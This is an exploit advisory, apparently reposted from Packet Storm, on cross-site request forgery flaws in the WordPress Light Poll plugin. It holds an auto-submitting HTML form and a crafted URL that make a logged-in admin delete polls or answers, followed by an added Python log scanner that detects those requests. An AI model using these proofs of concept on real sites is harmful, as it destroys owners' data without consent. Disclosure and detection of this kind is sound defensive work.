WordPress Light Poll 1.0.0 Cross Site Request Forgery
2024-8-13 23:10:52 Author: packetstormsecurity.com

# Exploit Title: Light Poll <= 1.0.0 - Polls Deletion via CSRF
# Date: 05-04-2024
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https://wordpress.org/plugins/light-poll/
# Version: <=1.0.0
# Tested on: Firefox
# Contact me: [email protected]

Description

The plugin does not have CSRF checks when deleting polls, which could allow
attackers to make logged-in users perform that action via a CSRF attack.

Proof of Concept

<html>
<body>
<form action="http://localhost/wp-admin/admin.php">
<input type="hidden" name="page" value="lp_settings" />
<input type="hidden" name="task" value="remove" />
<input type="hidden" name="id" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>

Reference:
https://wpscan.com/vulnerability/d598eabd-a87a-4e3e-be46-a5c5cc3f130e/

# Exploit Title: Light Poll <= 1.0.0 - Poll Answers Deletion via CSRF
# Date: 05-04-2024
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https://wordpress.org/plugins/light-poll/
# Version: <=1.0.0
# Tested on: Firefox
# Contact me: [email protected]

Description

The plugin does not have CSRF checks in some places, which could allow
attackers to make logged-in users perform unwanted actions via CSRF attacks.

Proof of Concept

Where <<POLL_ID>> and <<ANSWER_ID>> are valid:

https://example.com/wp-admin/admin.php?page=poll_settings&task=remove_answer&id=<<POLL_ID>>&answer_id=<<ANSWER_ID>>

Reference:
https://wpscan.com/vulnerability/d1449be1-ae85-46f4-b5ba-390d25b87723/
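
Detection example (added here; not part of the original advisory or of the plugin's code): a log check that flags the two deletion requests shown in the proofs of concept above when they were not sent from the site's own pages. It assumes combined-format access logs with a Referer field and a site host of blog.example; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# (page, task) pairs copied from the two proofs of concept in the advisory.
RISKY = {("lp_settings", "remove"), ("poll_settings", "remove_answer")}

# Combined log format: client - user [time] "METHOD target PROTO" status size "referer" ...
LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)

def classify(line, site_host):
    """Return a finding dict for a poll-deletion request not sent from site_host, else None."""
    m = LINE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    query = parse_qs(url.query)
    pair = (query.get("page", [""])[0], query.get("task", [""])[0])
    if not url.path.endswith("/wp-admin/admin.php") or pair not in RISKY:
        return None
    referer = m["referer"]
    ref_host = None if referer in ("", "-") else urlsplit(referer).hostname
    if ref_host == site_host.lower():
        return None  # request came from the site's own admin pages
    # "client" is the logged-in user's browser, not the party who planted the link.
    return {"client": m["client"], "time": m["time"], "task": pair[1],
            "id": query.get("id", [""])[0],
            "reason": "cross-site referer" if ref_host else "no referer"}

def scan(lines, site_host="blog.example"):
    """Classify every line and keep only the findings."""
    return [f for f in (classify(line, site_host) for line in lines) if f]

# Constructed sample lines for illustration; not taken from a real server.
SAMPLE = [
    '198.51.100.4 - - [05/Apr/2024:10:01:12 +0000] "GET /wp-admin/admin.php?page=lp_settings&task=remove&id=1 HTTP/1.1" 200 512 "https://other-site.example/" "Mozilla/5.0"',
    '198.51.100.4 - - [05/Apr/2024:10:03:40 +0000] "GET /wp-admin/admin.php?page=poll_settings&task=remove_answer&id=3&answer_id=9 HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [05/Apr/2024:10:05:02 +0000] "GET /wp-admin/admin.php?page=lp_settings&task=remove&id=2 HTTP/1.1" 200 512 "https://blog.example/wp-admin/admin.php?page=lp_settings" "Mozilla/5.0"',
    '198.51.100.4 - - [05/Apr/2024:10:06:15 +0000] "GET /wp-admin/admin.php?page=lp_settings HTTP/1.1" 200 2048 "https://blog.example/wp-admin/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A missing Referer is reported separately from a cross-site one because a referrer policy on the originating page can suppress the header.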


Source: https://packetstormsecurity.com/files/180081/wplightpoll100-xsrf.txt